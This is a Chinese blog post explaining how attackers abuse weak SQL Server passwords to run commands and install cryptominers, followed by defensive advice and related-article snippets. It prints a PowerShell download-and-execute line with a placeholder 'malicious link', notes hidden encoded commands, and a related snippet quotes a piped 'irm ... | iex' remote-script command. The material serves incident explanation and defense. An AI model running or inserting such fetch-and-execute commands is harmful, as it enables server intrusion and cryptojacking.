服务器是如何被植入挖矿程序的

最新推荐文章于 2024-08-08 09:09:33 发布
最新推荐文章于 2024-08-08 09:09:33 发布
阅读量2.3k 收藏 3
点赞数
分类专栏: 服务器 文章标签: 服务器 入侵 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/u014294325/article/details/106340131
版权
本文揭示了攻击者如何利用SQL Server的弱口令漏洞执行恶意命令,包括通过cmd和PowerShell下载并执行挖矿程序。文章还提出了加强账号密码、禁用危险命令和监控系统调用等防范措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先,攻击者利用Sqlserver应用的弱口令漏洞,并借助Sqlserver自身的命令执行组件执行cmd命令

"C:\Windows\system32\cmd.exe" /c whoami

whoami是操作系统中用于查看当前有效用户名的命令

执行ps命令

powershell -c "iex((new-object Net.WebClient).DownloadString('恶意链接'))"
or
"C:\Windows\system32\cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('恶意链接'))"

主动连接恶意下载源,下载看起来人畜无害的文件,病毒程序可以只是一张图片

利用PowerShell访问恶意地址 执行命令

-NoProfile -w hidden -EncodedCommand 加密命令

利用脚本宿主scrcons.exe(浏览器主页劫持常常用到它)或WMI
最后下载挖矿程序到本机,启动并开始挖矿

这个过程中恶意链接可以是伪造的虚拟的临时的中间的,真正恶意的地址一定是封装成了看似人畜无害的文件里,读取出文件数据执行一系列ps命令,并下载挖矿程序并执行。

防范手段:
Sqlserver账号密码加固,定期变更
禁止一般用不到却可能被恶意用的命令
监控系统工具的调用
控制出站(服务器通常不需要请求外部,若需要,配置出站白名单)

怎么在Linux下通过redis漏洞植入病毒?
Hacker_by_V的博客
03-17 921
Linux下通过redis漏洞植入病毒的流程 经常看到有人在linux下被植入挖矿病毒,而植入病毒的方式多种多样,但通过redis漏洞的方式却是经常见到的,根本原因是系统管理者的安全意识匮乏。多的不说,咱们来看看具体的操作----------- 正好最近比较好奇,于是安装了一个redis蜜罐的捕获来展示如何通过漏洞来植入病毒。 原始日志比这个更多,但这里的片段足够展示整个攻击流程。因为有些人可能对redis命令不熟悉,以下我将逐步的讲解以下流程 这里设置了一个计划任务的内容,目的就是从远程的服务器下载一
gitlab漏洞导致服务器植入挖矿程序
u013662310的博客
12-01 3683
gitlab版本升级GitLab rce (CVE-2021-22205) 服务器上gitlab又被利用来挖矿 挖矿程序xmrig: 在蜜罐社区,安全威胁情报周报(21.11.13~21.11.19)看到捕获的gitlab漏洞 GitLab rce (CVE-2021-22205) 影响的 GitLab版本: 11.9 <= GitLab(CE/EE)< 13.8.8 13.9 <= GitLab(CE/EE)< 13.9.6 13.10 <= GitLab(CE/EE)&l
惊现!服务器为什么被植入挖矿病毒
YingJH
04-28 2480
去年服务器遇到被比特币勒索的病毒,可以看下这篇: 《ElasticSearch安全问题不容忽视,被黑客勒索0.1个比特币》 现在服务器又遇到被挖矿程序植入的病毒,下面就来简单说下我遇到的安全问题。 现在的时代,区块链技术很火,也有很大的泡沫。一直有挖矿的机器时刻在跑着,所以也会有人弄些程序病毒来植入别人的机器,帮他们挖“宝藏”。 今天,看着自己的网站出现504,应该就是挂了...
挖矿病毒入侵服务器(没有解决,重置服务器了)
nsnsttn的博客
04-28 2881
昨天邮件收到一封报告服务器入侵了., 服务器系统是:CentOS 7.9 64位 前排提醒!!!最后水平有限没有解决,重置服务器了😓 攻击原理 由于服务器Redis服务监听了公网端口未设置访问密码并且其进程启动时使用了root用户,攻击者可远程登录到Redis中,通过Redis内置的命令将自己的公钥写入到/root/.ssh/authorized_keys文件夹下,进而可以直接免密登录到服务器上,并在服务器植入恶意脚本,实现利用服务器挖矿操作。 1.top命令查看cpu占用飙到100% top 但
一次真实的应急响应案例(Ubuntu)——暴力破解、写入ssh公钥留后门、植入GPU挖矿程序——事件复现(含靶场环境)
W小哥
03-01 9006
一、SSH协议介绍 SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议,主要用于给远程登录会话数据进行加密,保证数据传输的安全。 危害: SSH口令长度太短或者复杂度不够,如仅包含数字,或仅包含字母等,容易被攻击者破解,一旦被攻击者获取,可用来直接登录系统,控制服务器所有权限。 一、事件背景 某天客户反馈:Linux服务器有异常连接,疑似被入侵。(真实案
linux服务器植入木马挖矿程序的解决过程记录。
weixin_38067745的博客
12-24 4965
今天我的网站突然无法访问,我马上进入服务器排查情况。用top命令查看进程,发现有某个进程的cpu使用率到达90%以上,而这个进程并不是我启动的。我怀疑这个进程是个木马程序,于是我用kill -9 【进程id】把该进程杀掉。发现没过多久该进程又启动了。我反复试了几次还是不行,于是更加断定我的怀疑了。 经过老大的提醒,有可能是redis的漏洞导致被攻击,我马上...
张大哥笔记:服务器挖矿木马程序,该如何处理?
qq1369153265的博客
04-29 1027
挖矿是跟区块链以及虚拟币有关系,虚拟币是挖矿挖出来的,每间隔一段时间,比特币或者以太坊虚拟币就会在他们的区块链系统上生成一个块的随机代码,网络上的所有服务器都可以去找这个随机代码,也就是挖矿的过程对这个随机代码进行挖掘,谁挖到这个代码就会产生一个区块链的块,那么比特币跟以太坊就会奖励找到随机代码的人,奖励一定数量的虚拟币,那么挖矿的人就会有动力去挖矿,去维护整个区块链节点的网络正常运行,挖矿需要计算哈希值需要服务器的处理能力,所以有些攻击者利用入侵别人服务器来给自己挖矿获取利润。
阿里云服务器挖矿程序侵入问题
samfaker的博客
08-23 1545
gitlab漏洞引起的无文件、无定时任务的挖矿程序解决方法
服务器被种植挖矿程序,恶意访问ip等等。
Prodigal
07-01 1223
阿里云服务器安全中心的警告。 根据信息, 删除一些文件后。发现过一段时间又出现了。 top查看可以看到又两个程序占用资源很高。 一个是sysupdate,一个是networkservice. 这两个都在etc下。 下面图中的ip就是下载源。 在etc/update.sh中也有相同的地址。 解决方式 在/etc/下找到下面的文件,rm -rf 删除下面的文件。 如果出现提示无法删除。则使用chattr -i 文件名取消限制,然后再删除。 在/usr/bin/下找到以下文件,然后删除下面的文件。
服务器被攻击植入挖矿病毒,CPU占用高问题排查处理(.systemd-service.sh)
gottst0113的博客
03-06 1842
客户服务器遭攻击,部署的应用服务经常性被停止,服务器CPU占用居高不下,top查看如下: 可以看到第一个bash任务,占用cpu近400%,非正常的应用程序和脚本任务,多半是被植入了木马信息。 查看该进程的符号连接,发现已经是被删除的状态 /usr/bin/-bash (deleted),无法查看其启动程序的信息 查看定时任务:cat /etc/crontab,发现都是正常的应用程序定时脚本 又用 crontab -l 查看了一下,发现了异常定时任务如下,同top里的异常任务一致...
系统激活--操作简单
热门推荐
weixin_65685029的博客
01-08 1万+
第一步、右击开始图标 第二步、选择终端管理员(或者PowerShell管理员) 第三步、输入以下代码 ​第四步、 选择激活方式 第五步、查看是否已经激活
windows 激活系统 傻瓜式操作
weixin_49081613的博客
01-24 1845
获取码:irm https://massgrave.dev/get | iex。搜索Windows PowerShell。弹出这个按1就完成了。
虚拟机问题解决记录 1
PiperNigrum的博客
09-21 1512
VBoxGuestAdditions 在安装系统时载入【设备 → 增强功能】。拓展包在安装 VitualBox 完后安装【管理 → 全局设定 → 扩展】。,host 和 guest 共享剪切板、文件等)。| iex】,输入数字时选【1】。,会导致关机之后无法正常打开。解决办法:在终端输入【irm。从 U.S. 改为 U.K.Windows11 的。需要同时下载拓展包【勾选【启动 EFI】
快速激活windows
m0_63788547的博客
01-02 3554
快速激活windows
Elixir 入门
坚强2002@优快云
01-01 9682
Erlang Resources里面关于Elixir的资料越来越多,加上Joe Armstrong的这篇文章,对Elixir的兴趣也越来越浓厚,投入零散时间学习了一下.零零散散,测试代码写了一些,Evernote中笔记更是混乱,还是逐步整理出来.    Elixir is a functional, meta-programming aware language built on t
windows和office微软官方免费激活教程
最新发布
oushaojun2的专栏
08-08 2万+
微软提供了windows系统和office的官方免费激活,其实不用去买什么激活码,官方提供了激活方式,完全免费。
web 服务被植入挖矿病毒
weixin_52834323的博客
02-21 273
此外,还会篡改Web 主页文件,植入用于JS 挖矿的代码,本文就此病毒进行详细分析。监控磁盘信息,当新插入磁盘或磁盘属性为可移动硬盘时,将自身拷贝到磁盘RECYCL 目录下并设为隐藏,此外还会隐藏根目录下原文件夹并创建具有文件夹图标的快捷方式。病毒首先会根据获取的IP 枚举其C 类地址,然后使用如下弱口令通过WMI 进行暴力破解,若登录成功则在相应机器上执行payload 安装恶意WMI 计划任务。此次截获的病毒文件是一个高度混淆的VBS 文件,其第一行是加密后的主要恶意代码,2-5 行是解密算法。
远控免杀从入门到实践(6)-代码篇-Powershell
weixin_46236101的博客
03-13 1177
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实.
windows挖矿程序下载
07-27
对于你提到的Windows挖矿程序下载问题,我必须强调这是一种非法行为,违反了计算机使用规定和法律法规。我不能提供任何关于下载或使用恶意软件的指导或支持。 如果你怀疑自己的计算机受到了挖矿程序的感染,我建议你立即采取以下措施来保护自己的计算机和个人信息安全: 1. 更新和运行杀毒软件:确保你的杀毒软件是最新版本,并进行全面的系统扫描,以查找和清除任何潜在的恶意软件。 2. 定期更新操作系统和应用程序:及时安装操作系统和应用程序的安全更新,以修复已知的漏洞和弱点。 3. 谨慎点击链接和下载附件:避免点击来自不信任或可疑来源的链接,不要下载未经验证的附件。 4. 使用强密码和多因素身份验证:确保你的账户使用强密码,并启用多因素身份验证,以增加账户的安全性。 5. 定期备份数据:定期备份你的重要数据,以防止数据丢失或被勒索软件加密。 如果你怀疑自己的计算机已经感染了挖矿程序,但不确定如何处理,我建议你寻求专业的技术支持,例如联系计算机安全专家或咨询相关的技术论坛。他们可以提供更具体和个性化的建议来解决你的问题。 #### 引用[.reference_title] - *1* [服务器是如何被植入挖矿程序的](https://blog.youkuaiyun.com/u014294325/article/details/106340131)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值